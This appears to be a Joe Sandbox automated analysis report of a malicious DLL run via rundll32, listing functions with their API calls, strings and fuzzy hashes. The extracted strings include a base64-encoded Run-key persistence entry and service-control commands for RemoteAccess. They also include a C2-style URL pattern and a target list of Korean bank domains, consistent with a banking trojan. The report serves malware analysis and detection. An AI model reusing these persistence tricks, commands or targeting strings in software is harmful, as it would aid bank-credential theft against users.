                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F96D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$PointerRead$HandleInformationSize
                                                • String ID:
                                                • API String ID: 2979504256-0
                                                • Opcode ID: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                • Instruction ID: 75170083ee676786804825bfb6193be50822de76c0b42b9061a3e677b9cbe5b9
                                                • Opcode Fuzzy Hash: 859882acb2849d7037477cc4baac1a315585c36ddf65a2636b61d75e7ae6334e
                                                • Instruction Fuzzy Hash: C851BFB1A04305AFF314CE94CC81FBBB7E4EF88784F10891CF68597684EAB4E9059B56
                                                Function 1000A7D0 Relevance: 12.2, APIs: 8, Instructions: 164COMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A8E4
                                                • 6CEE2C70.MFC42(?), ref: 1000A8FA
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A918
                                                • 6CEE2C70.MFC42(?), ref: 1000A92E
                                                • InterlockedIncrement.KERNEL32(?), ref: 1000A965
                                                • InterlockedDecrement.KERNEL32(?), ref: 1000A977
                                                • 6CEE2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A99A
                                                • 6CEE2C70.MFC42(?,?,?,?,?,?,?,0000000C), ref: 1000A9A3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Interlocked$Decrement$Increment
                                                • String ID:
                                                • API String ID: 2574743344-0
                                                • Opcode ID: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
                                                • Instruction ID: 3093974cb4f3d434be5fdbb974d372fcb86c240b2bae65a57b53355a280814b6
                                                • Opcode Fuzzy Hash: c26f0b026ed7cb081274be26cba3a652331b1fc049732353bcbaeeb4cd700175
                                                • Instruction Fuzzy Hash: BE51B0B2A043529BE710DF658885A0EB7E4FB85690F424A2DF485D7205D734EDC5CB92
                                                Function 100090E0 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 91stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strstr
                                                • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$09121307$ECF4BBEA1588$NULL$http://
                                                • API String ID: 1392478783-2150159293
                                                • Opcode ID: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
                                                • Instruction ID: ecfe1f19982070fc907945bea6b76d3382d22d52cdee0c44685c771b8a3fb10f
                                                • Opcode Fuzzy Hash: a49b259e51406aef14fd146218e1fac6b9de25d8a0ef98e8ef8312d6623e819d
                                                • Instruction Fuzzy Hash: 91318F756047416BE724CB78CC01BEBB6D5EBC8344F44893CB74A8A285EF78E544C752
                                                Function 10009000 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 10004B10: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                  • Part of subcall function 10004C20: RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,1000906E,80000001,00000000,?), ref: 10004C4D
                                                • wsprintfA.USER32 ref: 10009097
                                                  • Part of subcall function 10004CC0: RegSetValueExA.KERNEL32(?,?,?,?,?,?,100090C2,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                  • Part of subcall function 10004C60: RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,74DF0F00), ref: 10004C65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseCreateNamePathShortValuewsprintf
                                                • String ID: %s "%s",init$EvtMgr$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==$c:\agtve\yhnvs.dll$c:\windows\SysWOW64\rundll32.exe
                                                • API String ID: 2251888957-1761549480
                                                • Opcode ID: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
                                                • Instruction ID: 555e9edd79d20669cd6279b5f68c84e268027a48e8a655114ccd52f9ce3fa163
                                                • Opcode Fuzzy Hash: 33cebf139591f84ff6b25fec94bbcb491949b6952fbd0d975d4c5d77bffff605
                                                • Instruction Fuzzy Hash: EF11ECB56442447BF354C228DC42FEB7698EB84340F800D28B745AA182EBF5E68882A7
                                                Function 10007F84 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • _CxxThrowException.MSVCRT ref: 10007F95
                                                • _CxxThrowException.MSVCRT(?,100147E8), ref: 10007FCD
                                                • lstrlen.KERNEL32(?,?,?,?,?,?), ref: 10007FF3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ExceptionThrow$lstrlen
                                                • String ID: DLLPath$mp3
                                                • API String ID: 3990665486-261125002
                                                • Opcode ID: 67fd9a1bfb3afa75ed2ed496ef011eb696334ff097cec00f352b52343f7cfdca
                                                • Instruction ID: 8c7f6d5efa12be28a40149e6bde7b072a113c2a48185607467365fb246139210
                                                • Opcode Fuzzy Hash: 67fd9a1bfb3afa75ed2ed496ef011eb696334ff097cec00f352b52343f7cfdca
                                                • Instruction Fuzzy Hash: CB019EB590015AAFDB00CF90CC84DFEB7BCFF88250F408159F205AA140DB79DE818B21
                                                Function 10007FFB Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 27registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: Close
                                                • String ID: DLLPath$net start RemoteAccess$sc config RemoteAccess start= auto$sc stop RemoteAccess
                                                • API String ID: 3535843008-2096816188
                                                • Opcode ID: 889d507d1f066a83a2383269c5cb2da371953c18f4bf873c46dcd3b7511ecae1
                                                • Instruction ID: f1805eb3d9b1d902160f785e8ff9d521c1139f98b36d7c23839a3f3e2841c964
                                                • Opcode Fuzzy Hash: 889d507d1f066a83a2383269c5cb2da371953c18f4bf873c46dcd3b7511ecae1
                                                • Instruction Fuzzy Hash: 82E04F75D55128ABE610EF999C85EEB7FACEF442A4F008156F6086A242CB359C50CAF2
                                                Function 1000FA40 Relevance: 7.6, APIs: 5, Instructions: 138fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,75BF8400,00000000,10010D59), ref: 1000FA95
                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,75BF8400,00000000,10010D59), ref: 1000FAD6
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$CreatePointer
                                                • String ID:
                                                • API String ID: 2024441833-0
                                                • Opcode ID: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                • Instruction ID: 308ac7dc05e7744f4e081a0bdb9278c18c1066b528d8c71e9578729df1ac5f0e
                                                • Opcode Fuzzy Hash: b3b746043fca136ba4e81b91f0f512960f4c623e21c03b3bed80360a50ba42b1
                                                • Instruction Fuzzy Hash: ED416AB26057419FE320CF29D884B5BB7ECEB943A9F108A3FF295C6940D370D8959B60
                                                Function 100065E0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 1000663D
                                                • 6CEE2C70.MFC42(00000000), ref: 1000666E
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 10006697
                                                • 6CEE2C70.MFC42(00000000), ref: 100066E2
                                                • CloseHandle.KERNEL32(00000000), ref: 100066F1
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseHandleMemoryProcessQueryReadVirtual
                                                • String ID:
                                                • API String ID: 1621033003-0
                                                • Opcode ID: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
                                                • Instruction ID: 86ba632d18ad3737237f260a16107ce2d7cf70f613dcfd362d55f89863a9b285
                                                • Opcode Fuzzy Hash: ce3c6dad6738674a56033ed313a0acf1917c8ebe045c92598b6288b6f3b7be5a
                                                • Instruction Fuzzy Hash: DB31BE717043529BE710CF14CC81A2BB3EAFB8A394F10852DF9809B245DB71ED46CB92
                                                Function 10010E90 Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
                                                • Instruction ID: bb61c64e4c2e60018887cf4b21b2b77a56d021ed7f9f06e12eb8ae260fd69302
                                                • Opcode Fuzzy Hash: 88411d57cb3e3dbeacca650520ba2354405dbfd77ca187300c3dbeb98fc05c50
                                                • Instruction Fuzzy Hash: B90140F5B102158BEB60DF199982B0772E8FF08254F44447AF986CFA05EBB5F884CB52
                                                Function 1000A070 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 137COMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 1000A18B
                                                • 6CEE2C70.MFC42(?,?,?,ROOT\CIMV2), ref: 1000A1AE
                                                • 6CEE2C70.MFC42(00000000,?,?,ROOT\CIMV2), ref: 1000A1B7
                                                Strings
                                                • Win32_NetworkAdapterConfiguration, xrefs: 1000A08B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: Win32_NetworkAdapterConfiguration
                                                • API String ID: 3448037634-4052814535
                                                • Opcode ID: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
                                                • Instruction ID: 49a93a9e5889f4a4d7e19c6da1a56bba55ab2360c9dac4e16cdcecec2b112754
                                                • Opcode Fuzzy Hash: dcbc64a1a200627460223833506d59ae0a485873ca728d9a28a1fc0d324c7d81
                                                • Instruction Fuzzy Hash: 1541C271A006158FE720DF18C88099AF3E6FB86684F248B19F855DB618E775EDC5CB81
                                                Function 1000A200 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedDecrement.KERNEL32(00000008), ref: 1000A20E
                                                • 6CEE2C70.MFC42(?), ref: 1000A231
                                                • 6CEE2C70.MFC42(00000000), ref: 1000A23A
                                                Strings
                                                • Win32_NetworkAdapterConfiguration, xrefs: 1000A201
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: DecrementInterlocked
                                                • String ID: Win32_NetworkAdapterConfiguration
                                                • API String ID: 3448037634-4052814535
                                                • Opcode ID: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
                                                • Instruction ID: c28a89dc488e9a731896744f18f44f90fe9456c4448bec02802ad89f904d7290
                                                • Opcode Fuzzy Hash: a83a43c36c2ad791abc108df72a98b97aa1142c5a07bb070410fceaf22dd0828
                                                • Instruction Fuzzy Hash: 5FF065B6A0122157F660CF29AC45B4773DCEF46AE0B024539FC45DB208E775EDC1CA90
                                                Function 100061F0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 124stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke, xrefs: 10006211
                                                • , xrefs: 10006294
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: strchr
                                                • String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.l|www.knbank.co.kr.l|openbank.cu.co.kr.l|www.busanbank.co.kr.l|www.nonghyup.com.l|www.shinhan.com.l|www.wooribank.com.l|www.hanabank.com.l|www.epostbank.go.kr.l|www.ibk.co.kr.l|www.idk.co.l|www.ke
                                                • API String ID: 2830005266-1486078621
                                                • Opcode ID: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
                                                • Instruction ID: 22f4c21b83fa130e3717f09086c4acdffd80da0c0eff8554752984f014423e24
                                                • Opcode Fuzzy Hash: 55542ce2e377251f9c8c239b7a9facd4ffdda20855bf5b2e39e9588a7081b524
                                                • Instruction Fuzzy Hash: 9431A136604A081B972CC978985566B7AC3FBC4270FA5073DFA6B872C0DEF59E488281
                                                Function 10010C90 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
                                                • Instruction ID: 76e20ac30a4a5d55d19c4aae950d6c9da367577159c72b0c1becef77eded0a0e
                                                • Opcode Fuzzy Hash: 024ebd3cf16b86b7db05172b19d3300478f962b870689d7c92be1f1a324c671d
                                                • Instruction Fuzzy Hash: 5441C6F5A043489FCB64CF69988155ABBD0FB48220F94863EF9998B741D7B4E984CB42
                                                Function 1000FE60 Relevance: 6.1, APIs: 4, Instructions: 114timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,?,00000000), ref: 1000FEA9
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1000FED6
                                                • GetLocalTime.KERNEL32(?), ref: 1000FF10
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 1000FF20
                                                  • Part of subcall function 1000F870: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FEC7,?), ref: 1000F87E
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                • String ID:
                                                • API String ID: 3986731826-0
                                                • Opcode ID: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                • Instruction ID: ff97dbb23fa899d1f5120cfb08b873e3bb9ee6e36dd1778d440c9f7421c03229
                                                • Opcode Fuzzy Hash: d76752544ed911a59727a7edf19554d459005f1b391c5dc4058420ad9c283b3b
                                                • Instruction Fuzzy Hash: A54182B1504B459FE310DF29C88096BF7E8FF89354F408A2EF59A83A51D771E909CB61
                                                Function 10011725 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                Download Yara Rule
                                                APIs
                                                • wcslen.MSVCRT ref: 10011738
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000002,00000000,00000000,?,?,00000000,00000000,10005F05,00000000), ref: 10011764
                                                • GetLastError.KERNEL32 ref: 10011774
                                                • GetLastError.KERNEL32 ref: 1001177A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: ErrorLast$ByteCharMultiWidewcslen
                                                • String ID:
                                                • API String ID: 4237787585-0
                                                • Opcode ID: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
                                                • Instruction ID: a60b9fdcdbd7bba2f34e03c5dbd801d92a7e0330a45912f01037cd33475d2502
                                                • Opcode Fuzzy Hash: f25346144e8588a17020577504c641a423692082a0a8ff6178c4d9976cd073da
                                                • Instruction Fuzzy Hash: 02F0227620815ABDE224E6764C88DAB77ECDB852F87124638F514DE2C2E834EC81C2B0
                                                Function 1000C800 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
                                                • Instruction ID: 31ee9fb48a3bb8c59739104f7274127136238450a65740f9f2d1a36a531c8075
                                                • Opcode Fuzzy Hash: e57b5a74ef33a4f8e7c02b94979bb301ef9140516089241c3c50ce787c9cd0f2
                                                • Instruction Fuzzy Hash: FE0167B5A107154BE791CB2CD881F86B3D8EF40298F14403BF8459B715EB74F981CB96
                                                Function 10004FF0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,1000509A,?,74DF0F00), ref: 10004FFD
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000500C
                                                • CloseHandle.KERNEL32(00000000), ref: 10005017
                                                • CloseHandle.KERNEL32(00000000), ref: 10005024
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.4135575303.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000005.00000002.4135525050.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135604530.0000000010012000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.000000001001E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000005.00000002.4135622472.0000000010020000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcess$OpenTerminate
                                                • String ID:
